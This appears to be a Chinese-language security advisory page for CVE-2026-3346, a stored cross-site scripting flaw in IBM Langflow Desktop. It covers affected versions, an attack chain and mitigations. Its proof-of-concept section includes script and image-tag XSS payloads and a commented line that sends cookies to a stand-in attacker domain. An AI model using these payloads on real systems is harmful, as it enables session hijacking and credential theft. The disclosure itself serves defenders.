CVE-2026-3346 CVSS 6.4 中危

CVE-2026-3346 IBM Langflow Desktop 存储型XSS漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3346

漏洞类型

存储型跨站脚本

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM Langflow Desktop

漏洞概述

IBM Langflow Desktop 在 1.6.0 至 1.8.4 版本中存在存储型跨站脚本（XSS）漏洞。由于应用程序对用户输入缺乏充分的过滤和验证，经过身份认证的攻击者可以在 Web UI 界面中嵌入恶意的 JavaScript 代码。当其他用户访问被篡改的页面时，恶意脚本将在其浏览器中执行，可能导致会话劫持或敏感凭证泄露，影响系统的机密性和完整性。

技术细节

该漏洞属于存储型 XSS（Stored XSS），其根本原因在于 IBM Langflow Desktop 的 Web UI 组件未能正确处理和转义用户提交的特定数据字段。攻击者利用低权限账号登录系统后，可以在受影响的功能模块（如工作流配置、节点描述或评论区域）注入恶意的 JavaScript 脚本。由于数据被存储在服务器端，当管理员或其他拥有更高权限的用户查看该被污染的页面时，嵌入的脚本会自动触发执行。利用 CVSS 向量中的 S:C（范围改变）特性，攻击者可以利用受害者的浏览器上下文发起进一步攻击，窃取 Cookie、Session ID 或执行未授权的操作，从而在受信任的会话中绕过部分安全检查。

攻击链分析

STEP 1

1. 初始访问

攻击者获取 IBM Langflow Desktop 的低权限账户凭证，成功登录系统。

STEP 2

2. 漏洞利用

攻击者在 Web UI 的输入字段（如工作流节点描述）中插入恶意的 JavaScript 载荷，并保存。

STEP 3

3. 数据存储

应用程序将未经过滤的恶意数据持久化存储在数据库中。

STEP 4

4. 触发执行

当管理员或高权限用户访问包含该恶意数据的页面时，服务器返回未转义的内容。

STEP 5

5. 攻击达成

恶意脚本在受害者的浏览器中执行，窃取 Session ID 或敏感凭证，导致账户被接管。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-3346 (Stored XSS)
Context: Inject into a vulnerable input field (e.g., Node Description) in IBM Langflow Desktop.
-->

<script>
  // Simple Proof of Concept to demonstrate execution
  alert('CVE-2026-3346 XSS Triggered: ' + document.cookie);

  // Advanced payload: Exfiltrate session data to an external server
  // fetch('https://attacker-controlled-domain.com/collect?data=' + encodeURIComponent(document.cookie));
</script>

<!-- Alternatively, using an image tag to trigger requests without script blocks if filters are basic -->
<img src=x onerror="alert('XSS via Image Tag')">

影响范围

IBM Langflow Desktop 1.6.0

IBM Langflow Desktop 1.6.1

IBM Langflow Desktop 1.7.x

IBM Langflow Desktop 1.8.0

IBM Langflow Desktop 1.8.1

IBM Langflow Desktop 1.8.2

IBM Langflow Desktop 1.8.3

IBM Langflow Desktop 1.8.4

防御指南

临时缓解措施

在官方补丁未发布前，建议严格限制非管理员用户对 Web UI 的写入权限。管理员应避免点击来源不明的链接或查看不可信用户提交的工作流内容。建议在网络边界部署 Web 应用防火墙 (WAF) 以检测和拦截常见的 XSS 攻击特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-3346
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3346
3 Details https://www.cvedetails.com/cve/CVE-2026-3346/
4 VulDB https://vuldb.com/cve/CVE-2026-3346
5 Link https://www.ibm.com/support/pages/node/7271095

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表